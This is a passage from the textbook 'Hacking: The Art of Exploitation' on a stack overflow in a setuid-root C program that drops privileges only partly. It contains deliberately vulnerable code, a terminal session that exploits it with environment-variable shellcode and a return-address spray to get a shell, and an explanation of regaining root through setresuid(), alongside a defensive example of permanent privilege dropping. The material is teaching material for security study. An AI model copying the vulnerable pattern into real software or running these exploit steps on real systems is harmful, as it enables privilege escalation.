Hacking - The Art of Exploitation, 2nd Edition



drop_privs.c

#include <string.h>  /* strcpy() */
#include <unistd.h>

void lowered_privilege_function(unsigned char *ptr) {
    char buffer[50];
    seteuid(5); // Drop privileges to games user (effective UID only).
    strcpy(buffer, (char *)ptr); // Deliberately unchecked copy: the overflow under discussion.
}

int main(int argc, char *argv[]) {
    if (argc > 1) // argv[1] only exists when an argument was supplied.
        lowered_privilege_function((unsigned char *)argv[1]);
    return 0;
}

Even though this compiled program is setuid root, the privileges are
dropped to the games user before the shellcode can execute. This only
spawns a shell for the games user, without root access.

reader@hacking:~/booksrc $ gcc -o drop_privs drop_privs.c
reader@hacking:~/booksrc $ sudo chown root ./drop_privs; sudo chmod u+s ./drop_privs
reader@hacking:~/booksrc $ export SHELLCODE=$(cat tiny_shell)
reader@hacking:~/booksrc $ ./getenvaddr SHELLCODE ./drop_privs
SHELLCODE will be at 0xbffff9cb
reader@hacking:~/booksrc $ ./drop_privs $(perl -e 'print "\xcb\xf9\xff\xbf"x40')
sh-3.2$ whoami
games
sh-3.2$ id
uid=999(reader) gid=999(reader) euid=5(games)
groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),104(scanner),112(netdev),113(lpadmin),115(powerdev),117(admin),999(reader)
sh-3.2$


Fortunately, the privileges can easily be restored at the beginning of our
shellcode with a system call that sets the privileges back to root. The most
complete way to do this is the setresuid() system call, which sets the real,
effective, and saved user IDs. Because drop_privs.c only changed the effective
UID with seteuid(), the saved user ID is still root, which is what makes the
restoration possible. The system call number and manual page are shown below.
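The defensive side of this point, as an added example that is not from the book: drop_privs.c changes only the effective UID, so the saved set-user-ID stays 0 and a later setresuid(0, 0, 0) succeeds; dropping all three IDs with setresuid() leaves nothing to restore. The target uid 65534 (nobody) and the function names are assumptions; both outcomes are only visible when the program starts with effective uid 0.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE          /* needed for setresuid()/getresuid() prototypes */
#endif
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

#define UNPRIV_UID 65534     /* assumed unprivileged target uid (nobody) */

/* Does the saved set-user-ID still belong to root? 1 = yes, 0 = no. */
int saved_uid_is_root(void) {
    uid_t r, e, s;
    if (getresuid(&r, &e, &s) == -1) return 0;
    return s == 0;
}

/* The restoration the text describes: ask for uid 0 in all three slots.
 * Returns 1 if the effective UID is root afterwards, 0 if the kernel refused. */
int try_restore_root(void) {
    if (setresuid(0, 0, 0) == -1) return 0;
    return geteuid() == 0;
}

/* Must start with euid 0. Drops to UNPRIV_UID either the way drop_privs.c
 * does (seteuid: effective only, saved UID stays 0) or permanently (setresuid
 * on all three), then reports whether root could be regained.
 * Returns 1 (regained), 0 (refused) or -1 (could not drop at all). */
int can_regain_root_after(int permanent) {
    int rc = permanent ? setresuid(UNPRIV_UID, UNPRIV_UID, UNPRIV_UID)
                       : seteuid(UNPRIV_UID);
    if (rc == -1) return -1;
    return try_restore_root();
}

int main(void) {
    if (geteuid() != 0) {
        printf("not root: saved uid %sroot, restore attempt -> %d\n",
               saved_uid_is_root() ? "" : "not ", try_restore_root());
        return 0;
    }
    /* Temporary drop first: expected 1, because the saved UID was still 0. */
    printf("seteuid() drop, then setresuid(0,0,0): regained root = %d\n",
           can_regain_root_after(0));
    /* Permanent drop: expected 0, there is no root ID left to fall back on. */
    printf("setresuid() drop, then setresuid(0,0,0): regained root = %d\n",
           can_regain_root_after(1));
    return 0;
}
```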

reader@hacking:~/booksrc $ grep -i setresuid /usr/include/asm-i386/unistd.h
#define __NR_setresuid 164
#define __NR_setresuid32 208
reader@hacking:~/booksrc $ man 2 setresuid
SETRESUID(2)               Linux Programmer's Manual              SETRESUID(2)

NAME
       setresuid, setresgid - set real, effective and saved user or group ID

SYNOPSIS
       #define _GNU_SOURCE
       #include <unistd.h>